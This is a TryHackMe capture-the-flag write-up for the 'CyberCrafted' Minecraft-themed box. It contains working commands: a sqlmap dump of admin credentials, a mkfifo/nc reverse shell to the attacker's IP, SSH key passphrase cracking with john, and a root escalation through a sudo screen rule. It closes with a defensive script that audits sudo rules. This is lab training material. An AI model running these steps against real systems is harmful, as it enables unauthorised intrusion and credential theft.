CyberCrafted Walkthrough En | TryHackMe – Write-up

Pwn this pay-to-win Minecraft server!

 

CyberCrafted is a Medium-level CTF from TryHackMe that requires fairly extensive enumeration. It remains accessible even for beginners, and the privilege escalation is pretty cool.


Enumeration

Command :

nmap -T5  10.10.235.114

Three ports are open: SSH, HTTP, and port 25565, which hosts the Minecraft game.

 

Web enumeration

dirsearch  -u 10.10.181.45

 

Dirsearch gives us the domain name of the website : http://cybercrafted.thm/

 

Adding the domain name to the hosts file.

echo '10.10.181.45    cybercrafted.thm' >> /etc/hosts

Sub-domains enumeration :

Command :

ffuf -w /usr/share/wordlists/SecLists/Discovery/DNS/namelist.txt -H "Host: FUZZ.cybercrafted.thm" -u http://cybercrafted.thm/ -fs 0

There are three subdomains that need to be enumerated with dirsearch. First, they must be added to the hosts file.

 

Enumeration on vhost (store and admin):

Command :

dirsearch -u http://admin.cybercrafted.thm/

The page http://admin.cybercrafted.thm/login.php asks for credentials that we do not have. In addition, the login does not appear to be vulnerable (no authentication bypass).

 

The page http://store.cybercrafted.thm/search.php lets us perform a search. This page is vulnerable to SQL injection (SQLi).

To exploit this automatically, intercept a search request in Burp Suite, save it to a file (here req.req), and pass that file to sqlmap.

Initial command to test the vulnerability :

sqlmap -r req.req

Final command (dump credentials) :

sqlmap -r req.req --dbms=mysql -D webapp -T admin --dump

By submitting the hash to https://crackstation.net/, we get the password.

Access to the admin.cybercrafted.thm/login.php site

Once logged in, the site lets us enter system commands.

Command :

id

Initial foothold

Since you can pass system commands, chances are you can get a reverse shell.

Command :

rm f;mkfifo f;cat f|/bin/sh -i 2>&1|nc 10.11.38.124 1234 > f

Lateral movement: www-data -> xXUltimateCreeperXx

Once the reverse shell has been received on nc, we are running as the www-data account. The /home folder contains the account xXUltimateCreeperXx, which holds a private key, id_rsa.

Command :

ssh xXUltimateCreeperXx@127.0.0.1 -i id_rsa

The private key is protected by a passphrase. To recover it, we use ssh2john and john. First, we copy the key locally to Kali.

 

Command :

scp id_rsa root@10.11.38.124:/root/trytohackme/cybercraft/

Command to crack the key : 

ssh2john id_rsa > id_rsa.hash

john id_rsa.hash --wordlist=/usr/share/wordlists/rockyou.txt

 

Lateral movement: xXUltimateCreeperXx -> cybercrafted

Once on the xXUltimateCreeperXx account, and given the questions asked by TryHackMe, you have to find the location of the Minecraft server files.

They are in /opt (nothing too complicated).

After listing the subfolders and files, the password for the cybercrafted account can be found in the following file: /opt/minecraft/cybercrafted/plugins/LoginSystem/log.txt

Command to switch to cybercrafted account :

su cybercrafted

 

Privilege Escalation:

First command to run:

sudo -l

 

The user is allowed to run the command /usr/bin/screen -r cybercrafted as root.

Command :

sudo /usr/bin/screen -r cybercrafted

And we get this window :

 

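To switch to the root account, use the following keyboard shortcut:

Ctrl+A, then Ctrl+C

This creates a new window in the attached screen session, and since the session runs as root, the shell in the new window is a root shell.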

#
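
Seen from the defender's side, the sudo rule above is the finding an audit should catch. The following added example (not part of the original write-up) parses `sudo -l` output and flags rules that run an interactive, shell-capable program as root; the sample output, the two extra rules and the program list are constructed assumptions.

```python
import re

# Constructed sample of `sudo -l` output; only the screen rule comes from
# the write-up, the other two rules are invented for contrast.
SAMPLE_SUDO_L = """\
Matching Defaults entries for cybercrafted on cybercrafted:
    env_reset, mail_badpass

User cybercrafted may run the following commands on cybercrafted:
    (root) /usr/bin/screen -r cybercrafted
    (root) NOPASSWD: /usr/bin/systemctl restart minecraft
    (ALL : ALL) /usr/bin/less /var/log/syslog
"""

# Assumption: short, non-exhaustive list of interactive programs that can
# start a shell or another command from inside their own interface.
SHELL_CAPABLE = {"screen", "tmux", "vi", "vim", "nano", "less", "more", "man"}

# One rule line looks like: "(runas) [TAG: ...] /path/to/binary args"
RULE_RE = re.compile(
    r"^\s+\((?P<runas>[^)]*)\)\s+(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmd>/\S+.*)$")


def parse_rules(sudo_l_output):
    """Return (runas, tags, command) tuples found in `sudo -l` text."""
    rules = []
    for line in sudo_l_output.splitlines():
        m = RULE_RE.match(line)
        if m:
            tags = [t.strip() for t in m.group("tags").split(":") if t.strip()]
            rules.append((m.group("runas").strip(), tags, m.group("cmd").strip()))
    return rules


def risky_rules(sudo_l_output):
    """Flag rules that run a shell-capable interactive program as root."""
    findings = []
    for runas, tags, cmd in parse_rules(sudo_l_output):
        binary = cmd.split()[0].rsplit("/", 1)[-1]
        as_root = any(u in ("root", "ALL") for u in re.split(r"[\s:,]+", runas))
        if as_root and binary in SHELL_CAPABLE:
            findings.append({"command": cmd, "runas": runas,
                             "nopasswd": "NOPASSWD" in tags})
    return findings


if __name__ == "__main__":
    for f in risky_rules(SAMPLE_SUDO_L):
        print("REVIEW:", f["command"], "runs as", f["runas"])
```

A rule that is not flagged is not thereby safe; the list only covers the programs named in it.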

That’s all folks

Thank you for taking the trouble to come to the site to read this Write Up

I hope you enjoyed it and learned something new.

Please feel free to leave a comment or share this article.
